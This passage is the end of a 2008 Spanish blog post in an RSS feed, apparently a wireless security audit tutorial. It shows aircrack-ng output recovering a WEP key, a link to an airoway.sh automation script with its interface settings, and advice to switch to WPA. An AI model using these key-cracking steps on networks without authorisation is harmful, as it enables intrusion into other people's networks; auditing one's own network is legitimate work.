<span style="color: #000000;">2</span>    <span style="color: #000000;">0</span><span style="color: #000000; font-weight: bold;">/</span>  <span style="color: #000000;">1</span>   <span style="color: #000000;">19</span><span style="color: #7a0874; font-weight: bold;">&#40;</span> <span style="color: #000000;">121</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 1B<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">15</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> CE<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> EB<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 2C<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">9</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">41</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">8</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">82</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">8</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> CD<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">6</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 00<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">15</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 1A<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 2B<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">34</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">39</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> A2<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #000000;">3</span>    <span style="color: #000000;">0</span><span style="color: #000000; font-weight: bold;">/</span>  <span style="color: #000000;">1</span>   <span style="color: #000000;">94</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">88</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">18</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">20</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">78</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">18</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D8<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">17</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">19</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">16</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D0<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">16</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 0D<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">10</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">83</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">9</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">69</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">8</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">75</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">6</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">82</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">6</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> A0<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">6</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">41</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">46</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> A2<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
&nbsp;
KEY FOUND<span style="color: #000000; font-weight: bold;">!</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">39</span>:<span style="color: #000000;">93</span>:<span style="color: #000000;">19</span>:<span style="color: #000000;">94</span>:<span style="color: #000000;">35</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
Decrypted correctly: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span></pre>
</div>
</div>
<p>Todo esto se puede hacer de forma mas simple, con el <a href="http://vive-libre.com/blog/etc/airoway.sh">airoway.sh</a> solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> <span style="color: #007800;">LISTEN</span>=<span style="color: #ff0000;">&quot;rtap0&quot;</span>
<span style="color: #007800;">INJECT</span>=<span style="color: #ff0000;">&quot;eth1&quot;</span></pre>
</div>
</div>
<p>Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.</p>
<p>Espero le haya sido de utilidad.</p>
<p>Referencias:</p>
<p>http://aircrack-ng.org/doku.php?id=ipw3945</p>
<p>http://seguridadwireless.net</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

